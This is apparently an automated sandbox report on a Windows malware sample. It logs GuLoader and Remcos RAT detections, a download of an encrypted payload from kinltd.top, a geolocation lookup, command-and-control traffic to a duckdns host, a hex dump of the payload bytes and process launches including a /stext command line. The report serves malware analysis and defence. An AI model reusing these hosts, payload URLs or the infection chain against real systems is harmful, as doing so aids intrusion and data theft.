                                                                                                                                                            Nov 5, 2024 10:03:31.837465048 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:31.837512970 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:46.235784054 CET348749893172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:46.237224102 CET498933487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:46.242326975 CET348749893172.111.244.132192.168.2.4
                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Nov 5, 2024 10:03:22.200946093 CET6183253192.168.2.41.1.1.1
                                                                                                                                                            Nov 5, 2024 10:03:22.373595953 CET53618321.1.1.1192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:27.049243927 CET5582453192.168.2.41.1.1.1
                                                                                                                                                            Nov 5, 2024 10:03:27.167170048 CET53558241.1.1.1192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:28.216886997 CET5931353192.168.2.41.1.1.1
                                                                                                                                                            Nov 5, 2024 10:03:28.224231005 CET53593131.1.1.1192.168.2.4
                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                            Nov 5, 2024 10:03:22.200946093 CET192.168.2.41.1.1.10x56a9Standard query (0)kinltd.topA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 5, 2024 10:03:27.049243927 CET192.168.2.41.1.1.10x6a4cStandard query (0)gerfourt99lahjou1.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 5, 2024 10:03:28.216886997 CET192.168.2.41.1.1.10x23c1Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                            Nov 5, 2024 10:03:22.373595953 CET1.1.1.1192.168.2.40x56a9No error (0)kinltd.top104.21.24.17A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 5, 2024 10:03:22.373595953 CET1.1.1.1192.168.2.40x56a9No error (0)kinltd.top172.67.216.75A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 5, 2024 10:03:27.167170048 CET1.1.1.1192.168.2.40x6a4cNo error (0)gerfourt99lahjou1.duckdns.org172.111.244.132A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 5, 2024 10:03:28.224231005 CET1.1.1.1192.168.2.40x23c1No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                            • kinltd.top
                                                                                                                                                            • geoplugin.net
                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            0192.168.2.449866104.21.24.17805500C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 5, 2024 10:03:22.384032011 CET168OUTGET /xeInzY158.bin HTTP/1.1
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                            Host: kinltd.top
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Nov 5, 2024 10:03:22.993654966 CET1031INHTTP/1.1 301 Moved Permanently
                                                                                                                                                            Date: Tue, 05 Nov 2024 09:03:22 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 167
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Cache-Control: max-age=3600
                                                                                                                                                            Expires: Tue, 05 Nov 2024 10:03:22 GMT
                                                                                                                                                            Location: https://kinltd.top/xeInzY158.bin
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qCuAeB0ghpYWXdz%2F%2F%2FIS0QEl837faTP2mMxUCKD6zkH5JOEvyOzYwUpaJj5i3Vv04VWn3E5VSQgkt7o5B8plCreg2nt%2Fpugj26oA5lEYbfb%2FYDe6DlDn%2BNET%2BS6Y"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8ddbab982a8f2893-DFW
                                                                                                                                                            alt-svc: h2=":443"; ma=60
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1391&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=168&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            1192.168.2.449901178.237.33.50805500C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 5, 2024 10:03:28.236336946 CET71OUTGET /json.gp HTTP/1.1
                                                                                                                                                            Host: geoplugin.net
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Nov 5, 2024 10:03:29.094611883 CET1165INHTTP/1.1 200 OK
                                                                                                                                                            date: Tue, 05 Nov 2024 09:03:28 GMT
                                                                                                                                                            server: Apache
                                                                                                                                                            content-length: 957
                                                                                                                                                            content-type: application/json; charset=utf-8
                                                                                                                                                            cache-control: public, max-age=300
                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 [TRUNCATED]
                                                                                                                                                            Data Ascii: { "geoplugin_request":"173.254.250.76", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            0192.168.2.449868104.21.24.174435500C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-11-05 09:03:23 UTC192OUTGET /xeInzY158.bin HTTP/1.1
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Host: kinltd.top
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2024-11-05 09:03:24 UTC977INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 05 Nov 2024 09:03:24 GMT
                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                            Content-Length: 493120
                                                                                                                                                            Connection: close
                                                                                                                                                            Last-Modified: Mon, 04 Nov 2024 21:17:20 GMT
                                                                                                                                                            ETag: "78640-6261ccf69648c"
                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                            CF-Cache-Status: MISS
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LP7erQE2sDE6ZZr%2F3U0aZCZnDwDS7TC244gf2f%2B9uscs0isiEQIhv%2FqtcEM4hgpPn1xI2lWLyXwyd%2FV6UsIRnw%2FGwjhrUrBdZng0zSOtIheRBEH%2Fk4kur3AXpja9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8ddbab9d9d294784-DFW
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1155&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=806&delivery_rate=2485836&cwnd=251&unsent_bytes=0&cid=f0abf11b0486953c&ts=912&x=0"
                                                                                                                                                            2024-11-05 09:03:24 UTC392INData Raw: 42 66 af 56 af b8 8f 5f 91 3b e7 4c 57 d2 29 b2 8c 86 4d 9f d6 9a 91 66 b2 b2 19 82 0f cd 04 96 44 84 e3 34 2c 77 44 46 b9 e4 18 73 e7 cb be a7 49 52 99 3e 83 dc 2f da a0 11 0c df 82 9a 9f 60 63 c7 9f de 3c 13 76 13 4a 8d 5a 2e 13 34 57 01 3f 3e ea 42 96 73 f8 fd f8 fc cc 67 f3 3f c8 f8 1a 92 8e 46 06 ce 67 a3 1f 22 33 a4 1d 14 91 8b 30 f5 5c 5d 83 8b b1 8e 89 be 3f 5c d9 90 a8 fb 8c 95 13 3f 05 9c dd 57 4f a9 53 4d 02 f4 ff e4 1f 13 48 a1 a6 b8 9e 44 bd 52 ed 9c 26 10 68 4d f8 2f 3f a2 62 2d 6a e2 64 be 83 54 4f ba dc 5c db f3 f6 8a a4 df 9c 33 f1 53 f8 d7 64 cc 1c 7a f3 11 a1 26 16 87 44 62 eb 17 d9 25 34 73 e8 7c 66 8b 6e 65 62 66 d5 4a f7 bd 03 43 87 a1 ad 8d 28 b0 19 1a b0 93 96 bc ce 0c 80 7e 8d a6 9f 77 01 65 e4 2a b4 1f d6 3c 6a 01 e5 db e9 e8 96
                                                                                                                                                            Data Ascii: BfV_;LW)MfD4,wDFsIR>/`c<vJZ.4W?>Bsg?Fg"30\]?\?WOSMHDR&hM/?b-jdTO\3Sdz&Db%4s|fnebfJC(~we*<j
                                                                                                                                                            2024-11-05 09:03:24 UTC1369INData Raw: 2d 9a 0e ad c2 08 63 90 25 12 91 b9 98 97 71 2c 7e a0 04 84 8e 58 0f 8d 31 b5 40 b1 c7 94 40 5f f9 15 d7 3b f8 72 50 19 03 0e 76 3d 7f 8d 79 dc 5d 98 de 8c af 21 ff 83 24 9f 9f 0e 0a 6b 8d 89 e2 bb d2 3c ce c5 79 1f f3 89 89 7f bb 7a 7c cf 0f a8 b0 b2 f8 1f f9 77 b5 dd d2 da 61 50 b4 c5 76 bf 7b 24 a0 21 9b 07 04 13 6b c1 7f 53 40 24 99 b2 b4 d3 9e b2 f5 98 f0 67 cf 92 55 bd ed ad 34 23 9b 87 64 0f c2 1c ba be c2 01 73 53 90 b4 32 ee 90 c5 9f 5e 9f 22 4c 9c 46 74 7d e5 71 ea 8d 93 bb 6a 92 67 13 39 4d d1 94 ce 7d 88 cb 63 a6 5d 2b 60 1e 2a 1c 2e 0d 3e 40 c0 6b 95 90 f1 60 03 66 e8 cb 8c c1 49 81 b6 4c 8e 8b dc 88 ce 64 89 97 f5 c1 ab 1b 6a 8a b8 d1 4f 17 c9 82 ab c9 ad 91 cc d0 ae 82 22 27 05 b5 d9 ac 83 a9 85 cd 43 29 92 62 ba 41 96 c4 14 ad 17 f3 0d 53
                                                                                                                                                            Data Ascii: -c%q,~X1@@_;rPv=y]!$k<yz|waPv{$!kS@$gU4#dsS2^"LFt}qjg9M}c]+`*.>@k`fILdjO"'C)bAS
                                                                                                                                                            2024-11-05 09:03:24 UTC1369INData Raw: 71 51 db ba 07 d1 c4 fc 08 1c f3 0d 3b a2 b1 0b a6 ab 6c 33 15 31 4f 29 53 24 7b 3b e2 86 5c 93 ae 0e 0b 43 86 08 00 8a d3 18 76 e8 c8 9b 31 7a 33 7c 76 f2 ad aa b3 1c 53 99 f2 b2 62 6f df ad 3e 28 ac bc be ed 2b 8e 1d 16 50 94 0e 37 52 ac 4e 6d c3 2e 9b 1a 5f 55 1f 59 f3 e1 7f 14 e7 c3 d0 cb 55 82 7c 40 a2 22 66 1f bb 37 08 9b 93 1a 76 cd 47 f0 e9 a7 c8 e3 42 b3 5b c6 0a a7 c7 b1 17 19 bd 7c 86 8a d3 4f 64 8c 01 e2 c6 48 48 58 4d 96 b6 11 6b a7 83 20 21 e7 21 b6 12 c3 2d 7b e0 b9 73 27 78 e9 cd 72 13 f5 31 ac d9 a1 0b 6d c0 2c 40 8a 3e 5e 08 fd 45 99 e1 b4 17 90 85 9f a9 f1 56 f4 b4 70 0f 80 86 a9 8d 50 7d b2 a2 c2 aa d2 92 9f 8b e0 41 62 08 61 24 d5 d7 4f af e7 2a bf 70 63 ee e8 f0 02 68 35 30 14 bc e9 cd a9 cc 76 84 e9 35 fc 59 56 16 61 ff b4 6b da db
                                                                                                                                                            Data Ascii: qQ;l31O)S${;\Cv1z3|vSbo>(+P7RNm._UYU|@"f7vGB[|OdHHXMk !!-{s'xr1m,@>^EVpP}Aba$O*pch50v5YVak
                                                                                                                                                            2024-11-05 09:03:24 UTC1369INData Raw: 7b 65 69 e2 59 56 47 28 ef f3 6b 5a e8 54 64 3b 89 90 f5 c7 51 c5 6e 6f 40 95 94 c4 e4 02 fa 4f 18 42 cc 95 44 f6 9e 72 f3 86 bb 6a f3 d0 51 68 94 e0 1e 87 13 68 99 2b 2b 34 5b cf cd f1 95 c8 2c af 48 2e 37 e6 e3 75 e4 8b ea e0 f7 dd 17 6a 50 0e ac 41 43 b7 df d2 df ab fa 94 0d 5d 9d 11 e4 bb f4 d1 76 ff d5 ca 8b ac 75 58 9f fc a2 cc 24 f9 6f 05 b8 51 f8 87 3a 9f 20 e3 33 3b 5a ce b6 ca 24 e9 22 18 2c 4a 25 79 8d a2 30 16 e9 86 b4 a7 0e b3 5a b0 0b e4 8c ef b3 67 ec ce 12 a3 8f 2b 20 63 9b fa 93 de 54 57 d6 b2 a3 bd 92 4c dd 8e f0 1c 52 e1 bd 3e b6 17 91 6f 12 ee 65 22 fc ed a0 26 ab 45 0d a6 84 d4 3a e8 e2 8e f6 41 d5 34 68 bb ef 1b b5 f8 99 c5 8e 61 05 69 83 c2 4f fe d3 02 1b 97 c7 28 0d 24 48 aa ed cf 4d 9d ac 6d a0 3d db 88 19 93 69 9a 8c ef 97 61 6b
                                                                                                                                                            Data Ascii: {eiYVG(kZTd;Qno@OBDrjQhh++4[,H.7ujPAC]vuX$oQ: 3;Z$",J%y0Zg+ cTWLR>oe"&E:A4haiO($HMm=iak
                                                                                                                                                            2024-11-05 09:03:24 UTC1369INData Raw: 03 99 89 70 aa 36 6c 29 88 20 f4 7b 30 f3 3d b0 8c 08 8d 01 7f e1 b4 d1 fc 2d 1a 11 1f cc 5e 26 9c 42 5e 02 14 a5 f7 b4 d8 4f e4 a9 90 5e 8c ec 03 d9 6b 73 0a 62 11 90 3a e3 99 5d 13 ef 69 a1 35 8a 33 bd e2 d4 48 13 52 7d cb 58 57 5a e3 27 fb 06 86 5a 2e bd 23 c8 03 87 3e 6e 82 e2 5a 7b 98 44 fc 9d d9 a7 02 8f f8 91 5c 66 71 04 ce 67 5c 2f ca e1 a6 1d 14 1a 5b bb 3b b4 43 81 8b b1 07 99 3d 72 a0 2e 7a ad 45 d6 b7 ee 31 8e ee 5f d7 9a 75 db 0c cf d5 ab 8c 29 3e 33 18 16 df f9 8f 88 02 8a ff af 73 04 22 8c 65 5d ad 42 b7 ce d1 47 d7 21 9c d0 f7 8f 7c 3d 54 7b 55 88 d2 91 d0 dc 50 f8 d7 31 47 f0 2b 59 c7 63 8a 25 3e 75 32 a4 a0 ff 8b b7 cb 45 94 e1 91 ae 7c cb 2e 0c 7b be 95 29 4b e1 15 8b 0f 2c 8c be 1a e9 24 16 1b f4 f2 35 c3 37 ee 46 0b e1 d3 33 1f 0a 57
                                                                                                                                                            Data Ascii: p6l) {0=-^&B^O^ksb:]i53HR}XWZ'Z.#>nZ{D\fqg\/[;C=r.zE1_u)>3s"e]BG!|=T{UP1G+Yc%>u2E|.{)K,$57F3W
                                                                                                                                                            2024-11-05 09:03:24 UTC1369INData Raw: 38 dd 89 bd ab be 0d 62 71 aa 50 4b af c8 8e 7c 31 39 2d 6f f0 a7 f5 d4 f3 c3 26 3e 82 a5 e8 b8 4c 07 d5 26 f2 79 9a 95 59 12 d8 b0 8c 47 a6 a2 33 7c ce f0 a3 e3 aa 3c aa 01 7e 86 f8 98 ac 7c 53 ad 3f d0 8c 50 76 9a cb cc 3b 8c 8b 52 9b 8d ad ef fd fe db cb 28 25 d1 8e e2 91 79 9c e5 60 fe 78 e6 e5 d0 f7 12 bb 8e f2 8f 0a 8a 37 c1 ee 59 63 7f 9b 84 35 2a fb 57 07 a2 59 6d 0d c8 2b 15 66 51 03 f3 2d 8b 3f 7e 4f a4 48 2a 67 43 bd 0a 3f c6 1c 43 73 ac ea 97 6c 8d 81 69 21 5f 38 cc e7 fe 30 f7 9c 1d 64 36 b0 7f dc b3 51 2c 2e dd 07 ba de b4 53 7f ce 4a c3 75 d1 1f 83 81 12 00 38 4f dc 72 96 5d 27 16 66 b6 b4 62 0d f8 45 cf 36 44 ba 21 ff dc 79 c4 5d 06 0a 3e 06 65 94 d0 a1 34 9d 4f 04 13 a4 16 fb 6f 71 d9 7f 3d f0 57 3d f7 f7 d9 bc 78 b5 8d 5f de 5f 00 5c d6
                                                                                                                                                            Data Ascii: 8bqPK|19-o&>L&yYG3|<~|S?Pv;R(%y`x7Yc5*WYm+fQ-?~OH*gC?Csli!_80d6Q,.SJu8Or]'fbE6D!y]>e4Ooq=W=x__\
                                                                                                                                                            2024-11-05 09:03:24 UTC1369INData Raw: 5a 16 e5 06 88 b6 2d 59 11 37 b8 d0 c3 76 0f 2b af eb f2 77 01 14 d6 92 b5 63 43 cb ef 71 53 b2 d3 9e ed ab 13 33 3c 0c c4 02 36 1f 26 25 0e 87 71 83 f0 49 d2 1a c2 3e fe cc 13 1b 7b 62 06 f0 c1 9f 5e c9 a9 83 04 d0 71 89 e1 8e 9e a9 9f 30 a5 7a 11 16 39 4d 5a 53 91 23 4b 98 36 f0 d6 c1 eb c7 7d 97 e3 cb ec 21 b8 1f 1e 5d 7a 8d b4 e3 12 34 63 4a 35 a5 c2 62 7e 00 17 60 bd 9e 76 68 ce 07 dd 33 e1 45 50 54 4b 37 c9 09 04 6c 2f 1d f2 5e 30 7d a9 ea a5 44 31 fa 09 53 7a f6 3f 5a 99 37 8f cf 59 2c ad a9 17 f3 e6 5b f0 54 83 4e b5 86 16 16 61 fe e5 07 4f c7 25 b2 e5 70 77 8e 0b 63 4c b7 13 5d e9 c8 66 b6 be 6e 2c 7f 72 01 c5 a0 7f 45 ec 4d a7 53 c9 d9 33 8e 29 90 b7 29 a3 8a 87 6f e9 2b e6 8f be 4b 57 b7 d5 88 db 6a 30 e8 51 a2 5e 18 ed a3 c8 b8 e1 26 be c0 ad
                                                                                                                                                            Data Ascii: Z-Y7v+wcCqS3<6&%qI>{b^q0z9MZS#K6}!]z4cJ5b~`vh3EPTK7l/^0}D1Sz?Z7Y,[TNaO%pwcL]fn,rEMS3))o+KWj0Q^&
                                                                                                                                                            2024-11-05 09:03:24 UTC1369INData Raw: 6e 54 a1 9b 91 e3 7e ff 28 bc 2a 4f 5c 1e 87 99 13 b1 30 51 84 5a fe 73 71 30 cf 3c 55 6d 97 95 a0 b8 44 2b 65 71 b1 b3 43 71 66 cf e8 82 5f 29 1c c9 01 ca 81 67 89 01 8a a1 ce 3c b0 5a 06 ca 4b 3b 01 34 bd e5 28 a8 5e b6 d0 26 7b be 13 36 49 6b 62 d4 a0 7a d2 39 1d 36 eb 0c d6 0c e4 57 a8 22 b6 00 66 f1 08 f4 3f 31 3b 8a 9f a9 a8 cb 8f 20 35 1e 7f 1a b1 89 db 8c 32 70 ad ef d2 f1 74 f0 21 45 3b 22 cc db 93 38 5f 63 0b 93 dc d6 92 65 cd a7 84 dd c7 27 fe c9 02 1c 17 f0 e3 dd 00 16 77 f6 a8 04 83 2d 72 2e 4e b2 ae 11 c7 26 5b 15 11 af 22 1c 1c 3d 11 1f 0a 0c 94 68 90 18 bc 1e 23 e9 33 9a 72 f6 5b 3d 29 cd 63 c0 d6 7c 01 66 5c 3c e3 cc 23 48 8b df 05 c2 28 96 8e 83 44 78 01 31 a5 2f 52 16 74 15 83 05 c6 9c a0 d8 6c f7 0a e4 52 78 02 a8 b2 9f 93 13 d4 d8 40
                                                                                                                                                            Data Ascii: nT~(*O\0QZsq0<UmD+eqCqf_)g<ZK;4(^&{6Ikbz96W"f?1; 52pt!E;"8_ce'w-r.N&["=h#3r[=)c|f\<#H(Dx1/RtlRx@
                                                                                                                                                            2024-11-05 09:03:24 UTC1369INData Raw: c0 9c d5 43 3a 8d ba 11 97 ce e4 c9 75 28 6b 91 8f 57 7f d5 41 4a 86 1e 57 c9 77 0a af 93 8d dc de 57 7f 4e 4b 32 9f 2c e3 0f 35 fa fa a8 48 6d b8 dd 6d 7d 90 78 b9 31 6e 88 fb d6 89 39 ea a7 0b 79 f9 2f f0 e7 59 b4 12 1f ce 13 77 4f af 6f 65 9b 71 ee 7a 1b 12 3e f3 2e 7b cc 08 52 21 ec d0 6e 64 77 c1 b6 13 96 24 32 ce 25 e8 ad 88 85 e0 dc ba 54 2d a4 72 f5 9c e8 8e 3b 46 f6 d4 88 32 4f f0 70 11 6e 3c 01 45 eb 3e 08 38 2c 04 3e 13 90 d4 a3 73 2e db b7 21 d5 d8 24 98 ac cc d7 a0 84 b3 2f 06 87 c6 d7 bc 21 6a 4f 74 7a 66 b0 df ff 0f 68 56 c8 5c f8 af 41 72 d5 34 1f bc 82 9a c5 bc e0 4e 1f d2 5e 7a 03 7c 4b dd ca a6 b2 cd e2 ef 5a 70 f9 1d 0f f5 1f d4 5f cb cd fd 98 f4 f2 5a 25 3e 4d 13 03 a5 de 1b 89 b2 2f 78 9a 0a a9 4a 79 67 06 bf a2 7f c1 15 c9 5b f8 08
                                                                                                                                                            Data Ascii: C:u(kWAJWwWNK2,5Hmm}x1n9y/YwOoeqz>.{R!ndw$2%T-r;F2Opn<E>8,>s.!$/!jOtzfhV\Ar4N^z|KZp_Z%>M/xJyg[
                                                                                                                                                            2024-11-05 09:03:24 UTC1369INData Raw: a5 5a c8 fb 06 fe f3 1a ca 30 be f8 cb ab 50 57 11 98 0c 66 98 af f2 a8 74 b9 f9 45 23 87 0f a9 7f 80 05 54 c1 dd d8 06 b1 a2 7c 00 f5 aa a9 37 3c b7 f1 c2 ff 13 99 70 56 ce 88 6c f0 ba 3e 42 ba 78 12 2a 54 d5 26 9f 1c f5 f4 3f b5 c5 23 c0 4e 3b 4b 21 58 a9 49 52 06 44 86 53 dd 98 44 3f 3b 87 f4 0a 43 f7 f7 98 1b ee 49 59 c0 3d 84 d8 f1 3f f0 3f e3 85 56 fb 9d c6 8a cb 14 94 da 1e 04 59 c8 1f 39 02 2b 57 cd 53 0b 26 0c 8e 3b e0 28 3d d5 ed fd 3b 2c ef f3 2e 40 50 be c0 31 38 35 90 da 11 b9 0b f7 65 e7 dd 0e 57 8c 8d 84 39 67 ee 3e 2b 85 3f d5 f3 c3 ad fd 9c a7 5c ac b3 25 d8 26 86 36 81 a3 d0 57 76 8a 19 ea 2d 2e 24 e8 93 a9 28 a8 87 e8 c7 fe 48 13 cd 64 b5 3f d8 6a d5 30 fd 48 4d 8b 95 05 34 a7 ee b1 66 72 d1 88 a5 63 5c b9 f7 d1 c8 38 73 27 91 12 9c 53
                                                                                                                                                            Data Ascii: Z0PWftE#T|7<pVl>Bx*T&?#N;K!XIRDSD?;CIY=??VY9+WS&;(=;,.@P185eW9g>+?\%&6Wv-.$(Hd?j0HM4frc\8s'S


                                                                                                                                                            Click to jump to process

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Target ID:0
                                                                                                                                                            Start time:04:01:56
                                                                                                                                                            Start date:05/11/2024
                                                                                                                                                            Path:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe"
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:840'016 bytes
                                                                                                                                                            MD5 hash:CBA1A6515C0AC0889F04664FEDAEC3E3
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2278025143.0000000004C7D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:4
                                                                                                                                                            Start time:04:02:57
                                                                                                                                                            Start date:05/11/2024
                                                                                                                                                            Path:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe"
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:840'016 bytes
                                                                                                                                                            MD5 hash:CBA1A6515C0AC0889F04664FEDAEC3E3
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2916398942.00000000054D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:false

                                                                                                                                                            Target ID:6
                                                                                                                                                            Start time:04:03:29
                                                                                                                                                            Start date:05/11/2024
                                                                                                                                                            Path:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe /stext "C:\Users\user\AppData\Local\Temp\ncfbreymgdrzyrcdisjodicyn"
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:840'016 bytes
                                                                                                                                                            MD5 hash:CBA1A6515C0AC0889F04664FEDAEC3E3
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:7
                                                                                                                                                            Start time:04:03:29
                                                                                                                                                            Start date:05/11/2024
                                                                                                                                                            Path:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            Wow64 process (32bit):true
